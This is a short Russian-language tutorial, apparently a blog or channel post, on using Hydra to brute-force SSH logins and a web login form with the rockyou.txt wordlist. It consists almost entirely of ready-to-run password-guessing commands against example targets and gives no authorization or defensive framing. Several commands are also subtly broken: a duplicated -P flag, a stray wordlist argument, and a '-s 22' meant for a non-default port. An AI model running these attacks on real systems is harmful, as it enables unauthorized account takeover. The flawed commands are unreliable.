Интересный инструмент для взлома пары логин/пароль, Hydra один из самых полезных предустановленных инструментов Kali linux.
Это программа для взлома логина\пароля. Представим, что есть узел 123.45.67.89, на нём SSH, это можно понять используя nmap.
Давайте попробуем подобрать к SSH логин и пароль используя знаменитый rockyou.txt.
# hydra -P login.txt -P /usr/share/wordlists/rockyou.txt ssh://123.45.67.89🔸Если вам уже известен логин или даже пароль, то можно заменить ключи и указать известный параметр.
# hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://123.45.67.89
или
# hydra -L login.txt -p qwerty123456seven /usr/share/wordlists/rockyou.txt ssh://123.45.67.89
🔸Вместо ключей
-L/-P, можно использовать -C, если у вас есть файл с логинами и паролями к ним разделёнными двоеточиями.# hydra -C /home/root/Desktop/login_pass.txt ssh://123.45.67.89
🔸Также можно запустить hydra с ключём
-t для установления количества параллельных подключений на цель.# hydra -P login.txt -P /usr/share/wordlists/rockyou.txt -t 8 ssh://123.45.67.89
🔸Если, вдруг SHH находится не на 22 порту, то можно использовать ключ
-s который изменит порт# hydra -P login.txt -P /usr/share/wordlists/rockyou.txt -s 22 ssh://123.45.67.89
🔸Также гидра можно брутфорсить страницы авторизации, например:
# hydra -l admin -P /usr/share/wordlists/rockyou.txt vuln.com http-post-form "/login.php:login=admin&pass=^PASS^:invalid login!" -vV -f
Где -vV дебаг мод показывающий login+pass, -f - выход из программы при нахождении пароля и логина